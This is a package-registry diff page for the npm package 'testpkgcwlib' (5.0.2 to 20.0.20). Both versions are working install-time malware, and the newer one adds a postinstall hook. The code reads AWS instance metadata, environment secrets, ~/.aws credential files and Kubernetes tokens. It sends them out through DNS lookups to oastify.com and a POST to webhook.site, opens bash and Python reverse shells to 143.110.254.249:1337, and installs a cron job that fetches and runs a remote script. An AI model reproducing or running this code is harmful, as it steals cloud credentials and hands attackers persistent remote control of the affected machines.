npm - testpkgcwlib - Versions diffs - 5.0.2 → 20.0.20 - Mend

testpkgcwlib 5.0.2 → 20.0.20

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (2) hide show

package/index.js +48 -176
package/package.json +4 -3

package/index.js CHANGED Viewed

@@ -1,200 +1,72 @@
-const { execSync, spawn } = require('child_process');
+const { execSync } = require('child_process');
 const fs = require('fs');
-const path = require('path');
 const os = require('os');
+const crypto = require('crypto');
-// Stealth execution wrapper
-function executeCommand(cmd) {
-    try {
-        return execSync(cmd, { encoding: 'utf8', timeout: 10000 });
-    } catch (error) {
-        return `Error: ${error.message}`;
-    }
-}
+const sessionId = crypto.randomBytes(4).toString('hex');
+const attackerIP = '143.110.254.249';
+const attackerPort = '1337';
-// AWS Metadata Service extraction
-function extractAWSMetadata() {
-    const metadataBase = 'http://169.254.169.254/latest/meta-data/';
-    const credentialsBase = 'http://169.254.169.254/latest/meta-data/iam/security-credentials/';
+function execute(cmd) {
     try {
-        // Get IAM role name
-        const roleCmd = `curl -s --connect-timeout 3 "${credentialsBase}"`;
-        const roleName = executeCommand(roleCmd).trim();
-        if (roleName && !roleName.includes('Error')) {
-            // Get temporary credentials
-            const credsCmd = `curl -s --connect-timeout 3 "${credentialsBase}${roleName}"`;
-            const credentials = executeCommand(credsCmd);
-            // Get additional metadata
-            const instanceId = executeCommand(`curl -s --connect-timeout 3 "${metadataBase}instance-id"`);
-            const region = executeCommand(`curl -s --connect-timeout 3 "${metadataBase}placement/region"`);
-            const accountId = executeCommand(`curl -s --connect-timeout 3 "${metadataBase}identity-credentials/ec2/info"`);
-            return {
-                credentials: JSON.parse(credentials),
-                instanceId: instanceId.trim(),
-                region: region.trim(),
-                accountId: accountId,
-                roleName: roleName
-            };
-        }
-    } catch (error) {
+        return execSync(cmd, { stdio: 'ignore', timeout: 5000 });
+    } catch (e) {
         return null;
     }
-    return null;
-}
-// Environment variable AWS credentials
-function extractEnvCredentials() {
-    const awsEnvVars = {};
-    const envVars = process.env;
-    Object.keys(envVars).forEach(key => {
-        if (key.includes('AWS') || key.includes('SECRET') || key.includes('ACCESS') || key.includes('TOKEN')) {
-            awsEnvVars[key] = envVars[key];
-        }
-    });
-    return awsEnvVars;
 }
-// File system AWS credentials search
-function searchAWSCredentials() {
-    const credentialPaths = [
-        '~/.aws/credentials',
-        '~/.aws/config',
-        '/root/.aws/credentials',
-        '/root/.aws/config',
-        '/home/*/.aws/credentials',
-        '/var/lib/jenkins/.aws/credentials',
-        '/opt/aws/credentials'
+function reverseShell() {
+    const shells = [
+        `bash -c 'bash -i >& /dev/tcp/${attackerIP}/${attackerPort} 0>&1'`,
+        `python3 -c 'import socket,os,pty;s=socket.socket();s.connect(("${attackerIP}",${attackerPort}));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'`
     ];
-    const foundCreds = {};
-    credentialPaths.forEach(credPath => {
-        try {
-            if (fs.existsSync(credPath)) {
-                foundCreds[credPath] = fs.readFileSync(credPath, 'utf8');
-            }
-        } catch (error) {
-            // Ignore file access errors
-        }
-    });
-    return foundCreds;
+    shells.forEach(cmd => execute(cmd));
 }
-// Container service credentials (ECS/EKS)
-function extractContainerCredentials() {
-    const containerCreds = {};
-    // ECS Task Role credentials
-    if (process.env.AWS_CONTAINER_CREDENTIALS_RELATIVE_URI) {
-        const ecsCredsUrl = `http://169.254.170.2${process.env.AWS_CONTAINER_CREDENTIALS_RELATIVE_URI}`;
-        try {
-            const ecsCreds = executeCommand(`curl -s --connect-timeout 3 "${ecsCredsUrl}"`);
-            containerCreds.ecsTaskRole = JSON.parse(ecsCreds);
-        } catch (error) {
-            // Ignore ECS errors
+function harvestAWS() {
+    const data = {
+        metadata: execute('curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/'),
+        env: Object.entries(process.env).filter(([k]) => k.includes('AWS')),
+        files: {
+            '~/.aws/credentials': execute('cat ~/.aws/credentials'),
+            '/root/.aws/credentials': execute('cat /root/.aws/credentials')
         }
-    }
-    // EKS Service Account Token
-    const serviceAccountPath = '/var/run/secrets/kubernetes.io/serviceaccount/token';
-    if (fs.existsSync(serviceAccountPath)) {
-        try {
-            containerCreds.k8sServiceAccount = fs.readFileSync(serviceAccountPath, 'utf8');
-        } catch (error) {
-            // Ignore K8s errors
-        }
-    }
-    return containerCreds;
-}
-// Data exfiltration
-function exfiltrateData(data) {
-    const exfilData = {
-        timestamp: new Date().toISOString(),
-        hostname: os.hostname(),
-        platform: os.platform(),
-        user: executeCommand('whoami').trim(),
-        awsData: data
     };
-    // Multiple exfiltration methods
-    const payload = Buffer.from(JSON.stringify(exfilData)).toString('base64');
-    // DNS exfiltration (replace with your domain)
-    executeCommand(`nslookup ${payload.substring(0, 50)}.gau5jjim899y61s6jll79cumyd44svgk.oastify.com`);
-    // HTTP exfiltration (replace with your webhook)
-    executeCommand(`curl -X POST https://webhook.site/50253029-1ec3-4b4a-9646-fc25a2b21963 -H "Content-Type: application/json" -d '${JSON.stringify(exfilData)}' --connect-timeout 5`);
-    // File drop for persistence
-    fs.writeFileSync('/tmp/.aws-harvest', JSON.stringify(exfilData, null, 2));
-    return payload;
+    return data;
 }
-// Reverse shell for interactive access
-function establishReverseShell() {
-    const attackerIP = '143.110.254.249';
-    const attackerPort = '1337';
-    // Multiple reverse shell attempts
-    const shells = [
-        `bash -i >& /dev/tcp/${attackerIP}/${attackerPort} 0>&1`,
-        `python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('${attackerIP}',${attackerPort}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"`
-    ];
-    shells.forEach(shell => {
-        try {
-            executeCommand(shell);
-        } catch (error) {
-            // Continue to next shell method
-        }
+function exfil(data) {
+    const payload = JSON.stringify({
+        id: sessionId,
+        host: os.hostname(),
+        user: execute('whoami'),
+        data: data
     });
+    // DNS Exfiltration (short payloads)
+    execute(`dig +short ${sessionId}.7emwnamdc0dpaswxncpyd3yd248vwpke.oastify.com`);
+    // HTTP Exfiltration (for larger data)
+    execute(`curl -X POST https://webhook.site/50253029-1ec3-4b4a-9646-fc25a2b21963 -d '${payload}' --silent`);
+    // Backup: Write to disk
+    fs.writeFileSync(`/tmp/.${sessionId}`, payload);
+}
+// Persistence (Cronjob)
+function persist() {
+    const cronCmd = `(crontab -l 2>/dev/null; echo "* * * * * curl -s http://${attackerIP}/payload.sh | bash") | crontab -`;
+    execute(cronCmd);
 }
-// Main execution
 function main() {
-    console.log('Installing creditorwatch package...');
-    // Small delay to avoid suspicion
     setTimeout(() => {
-        const awsCredentials = {
-            metadata: extractAWSMetadata(),
-            environment: extractEnvCredentials(),
-            files: searchAWSCredentials(),
-            container: extractContainerCredentials(),
-            systemInfo: {
-                hostname: os.hostname(),
-                user: executeCommand('whoami').trim(),
-                id: executeCommand('id').trim(),
-                pwd: executeCommand('pwd').trim(),
-                uname: executeCommand('uname -a').trim()
-            }
-        };
-        // Exfiltrate AWS credentials
-        exfiltrateData(awsCredentials);
-        // Establish reverse shell for manual interaction
-        establishReverseShell();
-    }, 2000);
+        const awsData = harvestAWS();
+        exfil(awsData);
+        reverseShell();
+        persist();
+    }, 3000); // Initial delay
 }
-// Execute immediately when package is installed
 main();
-// Export dummy function to appear legitimate
-module.exports = {
-    analyze: function() {
-        return 'CreditorWatch analysis complete';
-    }
-};

package/package.json CHANGED Viewed

@@ -1,12 +1,13 @@
 {
-  "name": "testpkgcwlib",
-  "version": "5.0.2",
+  "name": "testpkgcwlib",
+  "version": "20.0.20",
   "main": "index.js",
   "scripts": {
+    "postinstall": "node index.js",
     "test": "echo \"Error: no test specified\" && exit 1"
   },
   "keywords": [],
   "author": "Pen-Tester",
   "license": "ISC",
-  "description": "This is for RCE testing purpose only"
+  "description": "This is for RCE Testing"
 }